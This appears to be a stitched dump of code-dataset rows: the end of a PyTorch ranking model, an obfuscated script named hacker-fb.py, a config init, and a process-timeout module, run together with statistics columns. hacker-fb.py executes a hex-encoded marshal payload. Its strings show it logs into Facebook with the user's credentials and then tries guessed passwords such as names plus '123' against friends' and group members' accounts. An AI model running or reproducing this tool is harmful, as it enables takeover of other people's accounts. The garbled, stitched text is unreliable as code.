self.Xp2 = X[:, 2 * self.emb_size:]
self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zp1 = torch.mul(self.zql, self.Xp1)
self.zp2 = torch.mul(self.zql, self.Xp2)
o = self.cos(self.zp1, self.zp2)
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class CATS_manhattan(nn.Module):
def __init__(self, emb_size):
super(CATS_manhattan, self).__init__()
self.emb_size = emb_size
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
self.Xp2 = X[:, 2 * self.emb_size:]
self.z1 = torch.abs(self.Xp1 - self.Xq)
self.z2 = torch.abs(self.Xp2 - self.Xq)
self.zdiff = torch.abs(self.Xp1 - self.Xp2)
self.zp1 = torch.relu(self.LL2(self.LL1(self.Xp1)))
self.zp2 = torch.relu(self.LL2(self.LL1(self.Xp2)))
self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zd = torch.abs(self.zp1 - self.zp2)
self.zdqp1 = torch.abs(self.zp1 - self.zql)
self.zdqp2 = torch.abs(self.zp2 - self.zql)
self.p1tr = torch.cat((self.zp1, self.zdqp1), dim=1)
self.p2tr = torch.cat((self.zp2, self.zdqp2), dim=1)
o = torch.exp(-torch.sum(torch.abs(self.p1tr-self.p2tr), dim=1))
o = o.reshape(-1)
return o
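# Note (added): the score above is exp(-L1 distance) between the two
# transformed paragraph representations, so it lies in (0, 1] and equals 1
# only for identical inputs.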
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred | 40.133005 | 116 | 0.584326 | 2,526 | 16,294 | 3.662708 | 0.056215 | 0.077929 | 0.071336 | 0.043774 | 0.942175 | 0.924773 | 0.917748 | 0.901643 | 0.894401 | 0.871812 | 0 | 0.038009 | 0.265312 | 16,294 | 406 | 117 | 40.133005 | 0.734859 | 0.116791 | 0 | 0.848387 | 0 | 0 | 0.002554 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103226 | false | 0 | 0.006452 | 0 | 0.212903 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8cbf026e619f5f1de7507cff629be58a03d2fe1e | 23,145 | py | Python | hacker-fb.py | Nursy4h/King-Z | fa103fc3a1457c4c4e8d0d0e16d22874cbb89beb | [
"Apache-2.0"
] | null | null | null | hacker-fb.py | Nursy4h/King-Z | fa103fc3a1457c4c4e8d0d0e16d22874cbb89beb | [
"Apache-2.0"
] | null | null | null | hacker-fb.py | Nursy4h/King-Z | fa103fc3a1457c4c4e8d0d0e16d22874cbb89beb | [
"Apache-2.0"
] | null | null | null | ######################################
# Thank You Allah Swt.. #
# Thanks My Team : 1MP3R10R-T24M. #
# Thanks To All My Friends.          #
# Leader : Thio #
# CO Founder : Zhenter #
# CO Leader : Nazril #
# CO : rimesther #
# Cyto Xploit, Sazxt, Minewizard, #
######################################
import marshal, base64
exec(marshal.loads(base64.b16decode("630000000000000000040000004000000073170200006400006401006C00005A00006400006401006C01005A01006400006401006C02005A02006400006401006C03005A03006400006401006C04005A04006400006401006C05005A05006400006401006C06005A06006400006401006C07005A07006400006401006C08005A08006400006401006C09005A09006400006401006C0A005A0A006400006401006C0B005A0B006400006401006C0C005A0C006400006402006C0D006D0E005A0E00016400006403006C0F006D10005A1000016400006404006C0C006D11005A110001651200650100830100016501006A130064050083010001650C006A11008300005A14006514006A1500651600830100016514006A1700650C006A18006A1900830000640600640700830101016418006701006514005F1A00640A008400005A1B00640B008400005A1C00640C008400005A1D006500006A1E00640D0083010001640E008400005A1F00640F005A20006700005A21006700005A22006700005A23006700005A24006700005A25006700005A26006700005A27006700005A28006700005A29006700005A2A006700005A2B006700005A2C006700005A2D006700005A2E006700005A2F006700005A30006700005A31006410005A32006411005A33006412008400005A34006413008400005A35006414008400005A36006415008400005A37006538006416008401005A3900653A006417006B0200721302653400830000016E000064010053281900000069FFFFFFFF4E2801000000740A000000546872656164506F6F6C2801000000740F000000436F6E6E656374696F6E4572726F722801000000740700000042726F7773657274040000007574663874080000006D61785F74696D656901000000730A000000557365722D4167656E7473520000004F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E31366300000000000000000100000043000000731600000064010047487400006A01006A0200830000016400005328020000004E73160000000A1B5B33393B316D205468616E6B20596F75202A5F2A280300000074020000006F7374030000007379737404000000657869742800000000280000000028000000007302000000646774060000006B656C7561720E0000007304000000000105016300000000000000000200000043000000733200000064010047487400006A0100640200830100016403004748640400474864010047487400006A02006A0300830000016400005328050000004E7401000000207405000000636C656172734A0000000A1B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D201B5B33313B316D4B6F6E656B7369205465727075747573201B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D73650000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D53696C61686B616E20506572696B7361204B656D62616C69204B6F6E656B736920496E7465726E657420416E64611B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D28040000005205000000740600000073797374656D520600000052070000002800000000280000000028000000007302000000646774030000006F747712000000730C000000000105010D0105010501050163010000000200000003000000430000007343000000783C007C000064010017445D30007D01007400006A01006A02007C0100830100017400006A01006A0300830000017404006A050064020083010001710B00576400005328030000004E73010000000A677B14AE47E17A843F2806000000520600000074060000007374646F7574740500000077726974657405000000666C757368740400000074696D657405000000736C656570280200000074010000007A740100000065280000000028000000007302000000646774050000006A616C616E1A00000073080000000001110110010D01730C0000007368206E61726765742E73686300000000020000000600000043000000734F0000006401006402006403006404006405006406006706007D00007830007C0000445D28007D01006407007C010017477400006A01006A0200830000017403006A040064080083010001711F00576400005328090000004E73040000002E20202073040000002E2E202073040000002E2E2E2073050000002E2E2E2E2073050000002E2E2E2E2E73060000002E2E2E2E2E2E73330000000D1B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D536564616E67204C6F67696E1B5B33393B316D690100000028050000005206000000520D00
0000520F0000005210000000521100000028020000007405000000746974696B74010000006F2800000000280000000073020000006467740300000074696B23000000730A000000000218010D0108010D016900000000730D0000001B5B33316D4E6F742056756C6E73090000001B5B33326D56756C6E63000000000B000000060000004300000073170300007400006A010064010083010001791A007402006402006403008302007D000074030083000001576EE902047404007405006602006B0A007212030101017400006A0100640100830100017400006A0100640400830100017400006A01006405008301000164060047487406006407008301007D0100640800474864060047487406006409008301007D020064080047486406004748740700830000017911007408006A0200640A0083010001576E2D00047409006A0A006B0A0072DC00010101640B004748740B006A0C00640C0083010001740D00830000016E010058740E007408006A0F005F10007408006A1100640D00640E00830001017C01007408006A1200640F003C7C02007408006A12006410003C7408006A1300830000017408006A14008300007D03006411007C03006B0600729602793D016412007C010017641300177C020017641400177D0400690B0064150064160036641700641800367C0100640F0036641900641A0036641B00641C0036641B00641D0036641E00641F0036642000642100367C02006417003664220064230036642400642500367D05007415006A16006426008301007D06007C06006A17007C0400830100017C06006A18008300007D07007C05006A17006901007C070064270036830100016428007D03007419006A1A007C03006429007C05008301017D0800741B006A1C007C08006A1D008301007D0900740200640200642A008302007D0A007C0A006A1E007C0900642B0019830100017C0A006A1F0083000001640B004748642C004748642D00474864080047487419006A2000642E007C0900642B00191783010001740B006A0C00642F00830100017403008300000157719602047419006A21006A22006B0A00729202010101740D0083000001719602586E00006430007C03006B060072DA02640B0047486431004748643200474864310047487400006A010064330083010001740B006A0C00640C008301000174230083000001711303640B004748642C004748643400474864080047487400006A010064330083010001740B006A0C0064350083010001742400830000016E0100586400005328360000004E520A00000073090000006C6F67696E2E747874740100000072730C0000007368206E61726765742E736873070000007368206F2E736873370000000000001B5B33343B316DE29594E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959773480000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B313B33356D476D61696C1B5B33313B316D2F1B5B33353B316D4E6F6D6F721B5B313B39316D3A1B5B313B33396D2073370000000000001B5B33343B316DE2959AE29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959D733A0000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D1B5B313B33356D50617373776F72642046421B5B313B39316D3A1B5B313B33396D20731600000068747470733A2F2F6D2E66616365626F6F6B2E636F6D73380000000A0000001B5B33343B316DE2959AE29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E2959D690100000074020000006E7269000000007405000000656D61696C740400000070617373730B000000736176652D64657669636573470000006170695F6B65793D383832613834393033363164613938373032626639376130323164646331346463726564656E7469616C735F747970653D70617373776F7264656D61696C3D7360000000666F726D61743D4A534F4E67656E65726174655F6D616368696E655F69643D3167656E65726174655F73657373696F6E5F636F6F6B6965733D316C6F63616C653D656E5F55536D6574686F643D617574682E6C6F67696E70617373776F72643D733B00000072657475726E5F73736C5F7265736F75726365733D30763D312E3036326638636539663734623132663834633132336363323334333761346133327420000000383832613834393033363164613938373032626639376130323164646331346474070000006170695F6B6579740800000070617373776F7264741000000063726564656E7469616C735F7479706574040000004A534F4E7406000000666F726D6174740100000031741300000067656E65726174655F6D616368696E655F6964741800000067656E6572617
4655F73657373696F6E5F636F6F6B6965737405000000656E5F555374060000006C6F63616C65730A000000617574682E6C6F67696E74060000006D6574686F64740100000030741400000072657475726E5F73736C5F7265736F75726365737303000000312E3074010000007674030000006D64357403000000736967732700000068747470733A2F2F6170692E66616365626F6F6B2E636F6D2F726573747365727665722E7068707406000000706172616D73740100000077740C0000006163636573735F746F6B656E73380000000A0000001B5B33343B316DE29594E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29590E29597732E0000001B5B313B33396D5B1B5B313B33326DE29C931B5B313B33396D5D201B5B313B39326D4C6F67696E20537563657373734D00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6D6574686F643D706F737426756964733D6777696D75736133266163636573735F746F6B656E3D6902000000740A000000636865636B706F696E74520900000073470000000A1B5B33393B316D5B1B5B33313B316D211B5B33393B316D5D1B5B33333B316D536570657274696E796120416B756E20466220416E6461204B656E6120436865636B706F696E747310000000726D202D7266206C6F67696E2E747874732C0000001B5B33393B316D5B1B5B33313B316D211B5B33393B316D5D1B5B33333B316D4C6F67696E20476167616C2121690300000028250000005205000000520B00000074040000006F70656E7405000000737570657274080000004B65794572726F727407000000494F4572726F7274090000007261775F696E70757452170000007402000000627274090000006D656368616E697A65740800000055524C4572726F7252100000005211000000520C00000074040000005472756574080000005F666163746F7279740700000069735F68746D6C740B00000073656C6563745F666F726D7404000000666F726D74060000007375626D6974740600000067657475726C7407000000686173686C696274030000006E65777406000000757064617465740900000068657864696765737474080000007265717565737473740300000067657474040000006A736F6E74050000006C6F616473740400000074657874520E0000007405000000636C6F73657404000000706F7374740A000000657863657074696F6E735201000000520800000074050000006C6F67696E280B0000007405000000746F6B6574740200000069647403000000707764740300000075726C522C0000007404000000646174617401000000787401000000615218000000521200000074040000007A6564642800000000280000000073020000006467524C00000042000000738400000000010D0103010F010B0113010D010D010D0105010C01050105010C0105010501070103011101100105010D010B010C0110010D010D010A010C010C010301160153010F010D010C0114010601150112010F0111010A01050105010501050115020D010B0113010E020C0105010501050105010D010D010A0205010501050105010D010D01630000000000000000050000004300000073920000007400006A0100640100830100017919007402006402006403008302006A0300830000610400576E3700047405006B0A00725F0001010164040047487400006A0100640500830100017406006A070064060083010001740800830000016E0100587400006A0100640100830100017400006A0100640700830100017400006A010064080083010001740900830000016400005328090000004E520A00000073090000006C6F67696E2E747874521800000073200000001B5B313B39316D5B215D20546F6B656E20746964616B20646974656D756B616E7310000000726D202D7266206C6F67696E2E7478746901000000730C0000007368206E61726765742E73687307000000736820782E7368280A0000005205000000520B0000005231000000740400000072656164524D000000523400000052100000005211000000524C000000740B00000070696C69685F73757065722800000000280000000028000000007302000000646752320000008B000000731800000000020D01030119010D0105010D010D010B020D010D010D0163000000000C000000050000004300000073A7020000640100474864010047487400006402008301007D00007C00006403006B02007231006404004748740100830000016EAE017C00006405006B020072AF007402006A0300640600830100017402006A030064070083010001740400640800830100017405006A0600640900740700178301007D01007408006A09007C01006A0A008301007D02007856017C0200640A0019445D17007D0300740B006A
0C007C0300640B001983010001719100576E30017C0000640C006B020072A8017402006A0300640600830100017402006A030064070083010001640D00640E00144748740000640F008301007D0400793E007405006A06006410007C04001764110017740700178301007D01007408006A09007C01006A0A008301007D05006412007C050064130019174748576E270004740D006B0A00725101010101641400474874000064150083010001740E00830000016E0100587405006A06006416007C04001764170017740700178301007D06007408006A09007C06006A0A008301007D0300785D007C0300640A0019445D17007D0700740B006A0C007C0700640B001983010001718A01576E37007C00006418006B020072CB017402006A030064190083010001740F00830000016E1400641A007C000017641B00174748740100830000017402006A0300640600830100017402006A0300641C0083010001641D00741000741100740B00830100830100174748740400641E0083010001641F006420006421006703007D08007830007C0800445D28007D09006422007C090017477412006A13006A1400830000017415006A160064230083010001712E0257487402006A0300642400830100016425008400007D0A007417006426008301007D0B007C0B006A18007C0A00740B0083020001642700474874000064280083010001740E00830000016400005328290000004E520900000073380000001B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D50696C696E204E6F201B5B33313B316D3A1B5B33393B316D20740000000073180000001B5B313B39316D5B215D204A616E67616E206B6F736F6E6774020000003031520A000000730C0000007368206E61726765742E7368733D0000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4D656E67616D62696C2069642074656D616E201B5B313B39376D2E2E2E733300000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6163636573735F746F6B656E3D5251000000524E000000740C0000003230303030303030303030306928000000730A0000001B5B313B39376DE29590732C0000001B5B313B39316D5B2B5D201B5B313B39326D494420477275702020201B5B313B39316D3A1B5B313B39376D20732500000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F67726F75702F3F69643D730E000000266163636573735F746F6B656E3D733C0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39326D4E616D612067727570201B5B313B39316D3A1B5B313B39376D2074040000006E616D65731F0000001B5B313B39316D5B215D204772757020746964616B20646974656D756B616E73210000000A1B5B313B39316D5B201B5B313B39376D4B656D62616C69201B5B313B39316D5D731B00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F73350000002F6D656D626572733F6669656C64733D6E616D652C6964266C696D69743D393939393939393939266163636573735F746F6B656E3D740200000030307310000000726D202D7266206C6F67696E2E74787473200000001B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D201B5B313B39376D7318000000201B5B313B39316D50696C69682059616E672042656E61727307000000736820762E7368733A0000001B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4A756D6C6168204944201B5B313B39316D3A201B5B313B39356D73320000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4C6F6164696E67201B5B313B39376D2E2E2E73040000002E20202073040000002E2E202073040000002E2E2E2073410000000D0D1B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4D756C6169204D656E67616B736573204B656D616E616E201B5B313B39376D69010000007307000000736820622E736863010000000C000000030000005300000073CB0200007C00007D010079B7027400006A01006401007C01001764020017740200178301007D02007403006A04007C02006A05008301007D03007C030064030019640400177D04007406006A07006405007C010017640600177C040017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007296006409007C010017640A00177C040017640B001747486E2602640C007C0600640D00196B060072B600640E007C010017640B001747486E06027C030064030019640F00177D07007406006A07006405007C010017640600177C070017640700178301007D05007403006A08007C05008301007D060
06408007C06006B06007216016409007C010017640A00177C070017640B001747486EA601640C007C0600640D00196B0600723601640E007C010017640B001747486E86017C030064100019640400177D08007406006A07006405007C010017640600177C080017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007296016409007C010017640A00177C080017640B001747486E2601640C007C0600640D00196B060072B601640E007C010017640B001747486E06017C0300641100197D09007C09006A09006412006413008302007D0A007406006A07006405007C010017640600177C0A0017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007224026409007C010017640A00177C0A0017640B001747486E9800640C007C0600640D00196B0600724402640E007C010017640B001747486E78007C0300641400197D0B007406006A07006405007C010017640600177C0B0017640700178301007D05007403006A08007C05008301007D06006408007C06006B060072A0026409007C010017640A00177C0B0017640B001747486E1C00640C007C0600640D00196B060072BC02640E007C01001747486E0000576E07000101016E0100586400005328150000004E731B00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F730F0000002F3F6163636573735F746F6B656E3D740A00000066697273745F6E616D657403000000313233739100000068747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D7317000000266C6F63616C653D656E5F55532670617373776F72643D73480000002673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D3366353535663939666236316663643761613063343466353866353232656636522F00000073310000001B5B313B33396D5B20201B5B33323B316D537563657373201B5B33393B316D5D201B5B33313B316D5B201B5B33363B316D7313000000201B5B33313B316D5D205B1B5B33393B316D207309000000201B5B33313B316D5D73100000007777772E66616365626F6F6B2E636F6D74090000006572726F725F6D736773310000001B5B313B33396D5B1B5B33313B316D4368656B706F696E741B5B33393B316D5D201B5B33313B316D5B201B5B33363B316D7405000000313233343574090000006C6173745F6E616D657408000000626972746864617974010000002F52570000007406000000536179616E67280A00000052440000005245000000524D000000524600000052470000005248000000740600000075726C6C6962740700000075726C6F70656E74040000006C6F616474070000007265706C616365280C00000074030000006172677404000000757365725253000000740100000062740500000070617373315251000000740100000071740500000070617373327405000000706173733374050000006C616869727405000000706173733474050000007061737335280000000028000000007302000000646774040000006D61696ED600000073540000000001060103011B0112010E011F010F010C011802100110020E011F010F010C011802100110020E011F010F010C011802100110020A0112011F010F010C011802100110020A011F010F010C011802100110030301691E00000073400000000A1B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4861636B2046622054656D616E205375636573731B5B33393B316D202A5F2A735F0000000A1B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D4B656D62616C69204C616769201B5B33313B316D5B1B5B33343B316D591B5B33313B316D2F1B5B33343B316D541B5B33313B316D5D203A201B5B33393B316D2819000000523500000052560000005205000000520B000000521400000052440000005245000000524D000000524600000052470000005248000000524E0000007406000000617070656E64523300000052320000005208000000740300000073747274030000006C656E5206000000520D000000520F00000052100000005211000000520000000074030000006D6170280C00000074040000007065616B52180000005212000000740100000073740300000069646774030000006173777402000000726574010000006952150000005216000000527200000074010000007028000000002800000000730200000064675256000000
9C000000736A0000000001050105010C010C0105010A020C010D010D020A0113011201110118030C010D010D0109010C0103011B01120111010D0105010A010B021B011201110118030C010D010A020D0107010D010D0115010A010F010D0108010D01110201010D0209370C01100105010A01630100000004000000020000004300000073330000006401007C0000167D01007400006A01007C01008301007D02007402006A03007C02006A04008301007D03007C0300640200195328030000004E732D00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D653F6163636573735F746F6B656E3D2573524E0000002805000000524400000052450000005246000000524700000052480000002804000000524D0000005250000000740300000072657374030000007569642800000000280000000073020000006467740A0000006765745F75736572696414010000730800000000010A010F011201630200000007000000060000004300000073090100007400007C00008301007D02006401007C01007401007C0200830100660200167D0300690200640200640300366404007C000016640500367D04006406007D05007402006A03007C05006407007C03006408007C04008301027D06007C06006A040047486409007C06006A04006B060072AE007405006A0600640A00830100017405006A0600640B0083010001640C00640D00144748640E004748740700640F0083010001740800830000016E57006410007C06006A04006B060072F9007405006A0600640A00830100017405006A0600640B0083010001640C00640D001447486411004748740700640F0083010001740800830000016E0C006412004748740900830000016400005328130000004E738A0100007661726961626C65733D7B2230223A7B2269735F736869656C646564223A2025732C2273657373696F6E5F6964223A2239623738313931632D383466642D346162362D623061612D313962333966303461366263222C226163746F725F6964223A222573222C22636C69656E745F6D75746174696F6E5F6964223A2262303331366464362D336664362D346265622D616564342D626232396335646336346230227D7D266D6574686F643D706F737426646F635F69643D313437373034333239323336373138332671756572795F6E616D653D4973536869656C6465645365744D75746174696F6E2673747269705F64656661756C74733D747275652673747269705F6E756C6C733D74727565266C6F63616C653D656E5F555326636C69656E745F636F756E7472795F636F64653D55532666625F6170695F7265715F667269656E646C795F6E616D653D4973536869656C6465645365744D75746174696F6E2666625F6170695F63616C6C65725F636C6173733D4973536869656C6465645365744D75746174696F6E73210000006170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564730C000000436F6E74656E742D5479706573080000004F41757468202573740D000000417574686F72697A6174696F6E732200000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6772617068716C525100000074070000006865616465727373120000002269735F736869656C646564223A74727565520A000000730C0000007368206E61726765742E73686928000000730A0000001B5B313B39376DE29590732C0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39326D4469616B7469666B616E73210000000A1B5B313B39316D5B201B5B313B39376D4B656D62616C69201B5B313B39316D5D73130000002269735F736869656C646564223A66616C7365732F0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39316D44696E6F6E616B7469666B616E73100000001B5B313B39316D5B215D204572726F72280A000000528000000052740000005244000000524A00000052480000005205000000520B000000523500000074040000006C61696E52080000002807000000524D0000007406000000656E61626C65524E000000525100000052820000005250000000527E0000002800000000280000000073020000006467740300000067617A1B010000732C00000000010C011601180106011B0108010F010D010D01090105010A010A020F010D010D01090105010A010A02050174080000005F5F6D61696E5F5F2802000000730A000000557365722D4167656E7473520000004F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E3136283B00000052050000005206000000521000000074080000006461746574696D6
5740600000072616E646F6D5240000000527B0000007409000000746872656164696E67524600000074070000006765747061737352640000005244000000523700000074140000006D756C746970726F63657373696E672E706F6F6C5200000000741300000072657175657374732E657863657074696F6E7352010000005202000000740600000072656C6F6164741200000073657464656661756C74656E636F64696E67523600000074110000007365745F68616E646C655F726F626F7473740500000046616C736574120000007365745F68616E646C655F7265667265736874050000005F687474707414000000485454505265667265736850726F636573736F72740A000000616464686561646572735208000000520C0000005214000000520B000000521700000074040000006261636B7407000000746872656164737408000000626572686173696C740800000063656B706F696E747405000000676167616C7407000000696474656D616E740B000000696466726F6D74656D616E740500000069646D656D524E0000007402000000656D740B000000656D66726F6D74656D616E74020000006870740B000000687066726F6D74656D616E74060000007265616B7369740A0000007265616B73696772757074050000006B6F6D656E74090000006B6F6D656E6772757074080000006C69737467727570740600000076756C6E6F74740400000076756C6E524C0000005232000000525600000052800000005239000000528500000074080000005F5F6E616D655F5F2800000000280000000028000000007302000000646774080000003C6D6F64756C653E0200000073520000009C011002100110010A010D010C010D011C010C020904090809070D0209090601060106010601060106010601060106010601060106010601060106010601060106010601060309490911097809070C1B0C01")))
| 1,780.384615 | 22,731 | 0.988464 | 38 | 23,145 | 602.052632 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.877968 | 0.006524 | 23,145 | 12 | 22,732 | 1,928.75 | 0.116987 | 0.012227 | 0 | 0 | 0 | 0 | 0.996705 | 0.996705 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
8ce42ce5da6cf10297aef34237f89af5d9e36904 | 312 | py | Python | platform/hwconf_data/efr32zg14p/modules/WTIMER0/__init__.py | lenloe1/v2.7 | 9ac9c4a7bb37987af382c80647f42d84db5f2e1d | [
"Zlib"
] | null | null | null | platform/hwconf_data/efr32zg14p/modules/WTIMER0/__init__.py | lenloe1/v2.7 | 9ac9c4a7bb37987af382c80647f42d84db5f2e1d | [
"Zlib"
] | 1 | 2020-08-25T02:36:22.000Z | 2020-08-25T02:36:22.000Z | platform/hwconf_data/efr32zg14p/modules/WTIMER0/__init__.py | lenloe1/v2.7 | 9ac9c4a7bb37987af382c80647f42d84db5f2e1d | [
"Zlib"
] | 1 | 2020-08-25T01:56:04.000Z | 2020-08-25T01:56:04.000Z | import efr32zg14p.halconfig.halconfig_types as halconfig_types
import efr32zg14p.halconfig.halconfig_dependency as halconfig_dependency
import efr32zg14p.PythonSnippet.ExporterModel as ExporterModel
import efr32zg14p.PythonSnippet.RuntimeModel as RuntimeModel
import efr32zg14p.PythonSnippet.Metadata as Metadata | 62.4 | 72 | 0.907051 | 34 | 312 | 8.205882 | 0.294118 | 0.286738 | 0.311828 | 0.243728 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068259 | 0.060897 | 312 | 5 | 73 | 62.4 | 0.883959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
506fcd125e7f108bbe1d19547937ec5e6fd59499 | 4,976 | py | Python | tasker/devices/killer.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | tasker/devices/killer.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | tasker/devices/killer.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | import time
import threading
import multiprocessing
import os
import psutil
class LocalKiller:
def __init__(
self,
pid,
soft_timeout,
soft_timeout_signal,
hard_timeout,
hard_timeout_signal,
critical_timeout,
critical_timeout_signal,
memory_limit,
memory_limit_signal,
):
self.sleep_interval = 0.5
self.soft_timeout = soft_timeout
self.hard_timeout = hard_timeout
self.critical_timeout = critical_timeout
self.memory_limit = memory_limit
self.soft_timeout_signal = soft_timeout_signal
self.hard_timeout_signal = hard_timeout_signal
self.critical_timeout_signal = critical_timeout_signal
self.memory_limit_signal = memory_limit_signal
self.time_elapsed = 0.0
self.stop_event = threading.Event()
self.stop_event.clear()
self.created = False
self.pid_to_kill = pid
def killing_loop(
self,
):
while self.stop_event.wait():
if not psutil.pid_exists(self.pid_to_kill):
return
process = psutil.Process(self.pid_to_kill)
if self.memory_limit != 0 and process.memory_info().rss >= self.memory_limit:
os.kill(self.pid_to_kill, self.memory_limit_signal)
if self.soft_timeout != 0 and self.time_elapsed >= self.soft_timeout:
os.kill(self.pid_to_kill, self.soft_timeout_signal)
if self.hard_timeout != 0 and self.time_elapsed >= self.hard_timeout:
os.kill(self.pid_to_kill, self.hard_timeout_signal)
if self.critical_timeout != 0 and self.time_elapsed >= self.critical_timeout:
os.kill(self.pid_to_kill, self.critical_timeout_signal)
time.sleep(self.sleep_interval)
self.time_elapsed += self.sleep_interval
def start(
self,
):
if not self.created:
killing_loop_thread = threading.Thread(
target=self.killing_loop,
)
killing_loop_thread.daemon = True
killing_loop_thread.start()
self.created = True
self.stop_event.set()
def stop(
self,
):
self.stop_event.clear()
def reset(
self,
):
self.time_elapsed = 0.0
def __del__(
self,
):
self.stop()
class RemoteKiller:
def __init__(
self,
pid,
soft_timeout,
soft_timeout_signal,
hard_timeout,
hard_timeout_signal,
critical_timeout,
critical_timeout_signal,
memory_limit,
memory_limit_signal,
):
self.sleep_interval = 0.5
self.soft_timeout = soft_timeout
self.hard_timeout = hard_timeout
self.critical_timeout = critical_timeout
self.memory_limit = memory_limit
self.soft_timeout_signal = soft_timeout_signal
self.hard_timeout_signal = hard_timeout_signal
self.critical_timeout_signal = critical_timeout_signal
self.memory_limit_signal = memory_limit_signal
self.time_elapsed = multiprocessing.Value('d', 0.0)
self.stop_event = multiprocessing.Event()
self.stop_event.clear()
self.created = False
self.pid_to_kill = pid
def killing_loop(
self,
):
while self.stop_event.wait():
if not psutil.pid_exists(self.pid_to_kill):
return
process = psutil.Process(self.pid_to_kill)
if self.memory_limit != 0 and process.memory_info().rss >= self.memory_limit:
os.kill(self.pid_to_kill, self.memory_limit_signal)
with self.time_elapsed.get_lock():
if self.soft_timeout != 0 and self.time_elapsed.value >= self.soft_timeout:
os.kill(self.pid_to_kill, self.soft_timeout_signal)
